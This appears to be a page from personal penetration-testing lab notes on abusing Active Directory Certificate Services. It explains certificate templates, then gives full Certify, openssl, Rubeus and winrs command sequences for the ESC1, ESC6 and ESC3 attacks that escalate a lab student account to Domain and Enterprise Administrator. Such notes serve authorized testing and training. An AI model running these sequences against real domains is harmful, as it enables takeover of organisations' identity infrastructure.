Pentesting and Red Teaming Notes
  • 🖥️Pentesting and Red Teaming Cheatsheet
  • Web Application Pentesting(BlackBox)
    • SQL Injection
    • Blind SQL Injection
    • Path Traversal
    • Attacking Authentication
    • Race Conditions
    • Business Logic Vulnerabilities
    • Command Injections
    • Information disclosure
    • Access Controls
    • File upload Attacks
    • XXE
    • Server Side Request Forgery
    • Api Testing
    • noSQL
    • DOM based vulnerabilities
    • Cross Site scripting
  • Infrastructure Pentesting
    • Windows Privilege Escalation
    • Attacking Active Directory
    • File Transfers and Download
    • Pivoting(Tunneling and Port Forwarding)
    • Linux Privilege Escalation
    • Stealing NTLM hashes
    • Tricks and Tips
  • Active Directory Pentesting
    • powershell theory
    • Methodology
    • domain enumeration
    • File Transfer
    • PowerShell ADModule
    • Local Privilege Escalation
    • PowerView Commands
    • ACLs Descriptions
    • ACLs Abuse
    • ACL
    • Trusts
    • User Hunting
    • group policy
    • Mimikatz
    • BloodHound
    • LateralMovement
    • Kerberoasting
    • defense bypasses
    • Set-SPN
    • ASREProasting
    • Unconstrained Delegation
    • Constrained Delegation
    • Resource Based Constrained Delegation
    • AD CS
    • Persistance
    • Priv Esc Trusts Inside Forest
    • MSSQL Servers
    • Priv Esc Trusts Across Forest
    • Tips And Tricks
    • Service Tickets and Abuses
  • Reconnaissance
    • Web Application Reconnaissance
    • External Reconnaissance
Powered by GitBook
On this page
  • Certificate Template
  • AD CS components
  • Working
  • Abusing AD CS
  • We can use the Certify tool (https://github.com/GhostPack/Certify) to enumerate (and for other attacks) AD CS in the target forest:
  • Enumerate vulnerable templates:
  • Common Vulnerable scenrios
  • ESC1(Enrolee can request cert for ANY user)
  • Same way we can also request certificate for the administrator of mneycorp.local also called Enterprise Administrator here only difference is the altname parameter.
  • ESC6(EDITF_ATTRIBUTESUBJECTALTNAME2 setting on CA -Request certs for ANY user)
  • To request TGT for EA abusing ESC6 use below
  • ESC3 (Request an enrollmentagent certificate and use it to request cert on behalf of ANY user)
  1. Active Directory Pentesting

AD CS

Active Directory Certificate Services (AD CS) enables use of Public Key Infrastructure (PKI) in active directory forest. AD CS helps in authenticating users and machines, encrypting and signing documents, filesystem, emails and more. AD CS is the Server Role that allows you to build a public key infrastructure (PKI) and provide public key cryptography, digital certificates, and digital signature capabilities for your organization.

Certificate Template

Certificate templates in Active Directory Certificate Services (AD CS) are preconfigured certificate request templates that define the properties and characteristics of certificates issued by the AD CS infrastructure. These templates serve as blueprints for generating and managing various types of certificates within an organization.They define key elements such as certificate purpose, key usage, validity period, subject name format, and other extensions. By using certificate templates, administrators can simplify the process of requesting and issuing certificates, ensuring compliance with security policies and regulatory requirements.

AD CS components

  • CA(Certificate Autority): Here, the server with the AD CS role is the certificate authority, usually DC is the certificate authority. Certificate Authority issues the certificate.

  • Certificate: This is issued to the user or machine by the CA and can be used for authentication, encryption, signing, etc

  • CSR(Certificate Signing Request or asking for a certificate): This is Certificate Signing Request made by the client to the Certificate Authority(CA) to request a certificate.

  • Certificate Template: It defines settings for a certificate. Contains information like enrolment permission, EKUs, expiry, etc

  • EKU OIDs: Extended Key Usage Object Identifiers. These dictate the use of a certificate template(client authentication, smart card logon, subCA, etc)

Working

  • The client generates public/private key pair

  • Client sends Certificate Signing Request(CSR) to the CA(Certificate Authority) which contains the template(eg: for code signing), Subject(user who requested), EKU and their public key

  • The CA(Certificate Authority) verifies the CSR if the template exists, If the user requires approval, if the user has permission and so on.

  • The CA generates a certificate and signs it using the CA private key.

  • CLient stores the certificate in Windows Certificate Store and uses it for their purpose.

Abusing AD CS

  • Extracting user and machine certificates

  • Use the certificates to retrive NTLM hash

  • User and machine level persistance

  • Escalation to Domain Admin and Enterprise Admin

  • Domain persistance

We can use the Certify tool (https://github.com/GhostPack/Certify) to enumerate (and for other attacks) AD CS in the target forest:

certify.exe cas

Enumerate vulnerable templates:

Certify.exe find /vulnerable

Common Vulnerable scenrios

  • Any certificate template which allows domain users enrollment rights along with pkiextendedkeyusage property as Certificate Request Agent is considered vulnerable which allows to request certificate on behalf of other users.

  • CA allows normal/low privileged user enrollment rights Allow Enroll: NT Authority\ Authenticated Users

ESC1(Enrolee can request cert for ANY user)

This allows escalation of privilege for a domain admin since enrolee can request certificate for a domain admin.

Certify.exe find /enrolleeSuppliesSubject

Check for properties msPKI-Certificates-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT then check Enrollment Rights property if we can see our user or group where our compromised user is a part of. The template "HTTPSCertificates" allows enrollment to the RDPUsersgroup.Request a certificate for DA (or EA) as student

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator

-Now copy paste the certificate and save as anything.pem and convert this pem to pfx using windows version of openssl.

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx

  • Enter password as anything and Ignore the unable to write 'random state' message and use Rubeus to request TGT for Domain Administrator or the Enterprise Administrator

C:\AD\Tools\Rubeus.exe asktgt /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt
winrs -r:dcorp-dc cmd

Same way we can also request certificate for the administrator of mneycorp.local also called Enterprise Administrator here only difference is the altname parameter.

Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator
openssl.exe pkcs12 -in C:\Users\student145\Desktop\esc1-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\Users\student145\Desktop\esc1-EA.pfx

  • Note the dc parameter here.

Rubeus.exe asktgt /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:C:\Users\student145\Desktop\esc1-EA.pfx /password:SecretPass@123 /ptt
winrs -r:mcorp-dc cmd

ESC6(EDITF_ATTRIBUTESUBJECTALTNAME2 setting on CA -Request certs for ANY user)

If the certificate authority(CA) has EDITF_ATTRIBUTESUBJECTALTNAME2 flag set. This means that we can request a certificate for ANY user from a template that allow enrollment for normal/low-privileged users. Here, the template "CA-Integration" grants enrollment to RDPUsers group. Request certificate as DA or EA as student user.

Certify.exe find
Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"CA-Integration" /altname:administrator

  • Convert from cert.pemto pfx(esc6.pfx below) and use it to request a TGT for DA (or EA).

Rubeus.exe asktgt /user:administrator /certificate:esc6.pfx /password:Test@123 /ptt

To request TGT for EA abusing ESC6 use below

Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"CA-Integration" /altname:moneycorp.local\administrator

Copy the certificate as anything.pem and convert to pfx using openssl then use below to request TGT as EA.

Rubeus.exe asktgt /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:C:\Users\student145\Desktop\esc6.pfx /password:Test@123 /ptt

ESC3 (Request an enrollmentagent certificate and use it to request cert on behalf of ANY user)

This is little bit tricky, here template has EKU for Certificate Request Agent(pkiextendedkeyusage : Certificate Request Agent) and grants enrollment rights to Domain users and we find another template that has an EKU that allows for domain authentication and has application policy requirement of certificate request agent(Application Policies : Certificate Request Agent) we can request certificate on behalf of any user. Note here we are abusing two templates.

First we need to find template which has pkiextendedkeyusage : Certificate Request Agent and grants enrollment rights to domain users.

Certify.exe find /vulnerable

  • Lets suppose we found such template which is SmartCardEnrollment-Agent again we search for template which allows for domain authentication and has application policy requirement of certificate request agent Application Policies : Certificate Request Agent

C:\AD\Tools\Certify.exe find

and suppose we found such template SmartCardEnrollment-Users.

  • First we will request enrollment agent certificate from SmartCardEnrollment-Agent template.

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Agent /altname:moneycorp.local\administrator

  • Save the certificate as esc3-agent.pem

  • Using openssl we convert the pem to pfx

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3-agent.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-agent.pfx

  • Now we will use the above Enrollment Agent Certificate(note parameter /enrollcert) to request a certificate for EA from the template SmartCardEnrollment-Users

Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:mcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:SecretPass@123

  • We will again save the certificate as esc3-EA.pem and convert to pfx 

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-EA.pfx

  • Finally we will use rubeus to request TGT as enterprise administrator 

C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\administrator /certificate:C:\AD\Tools\esc3-EA.pfx /dc:mcorp-dc.moneycorp.local /password:SecretPass@123 /ptt
PreviousResource Based Constrained DelegationNextPersistance

Last updated 10 months ago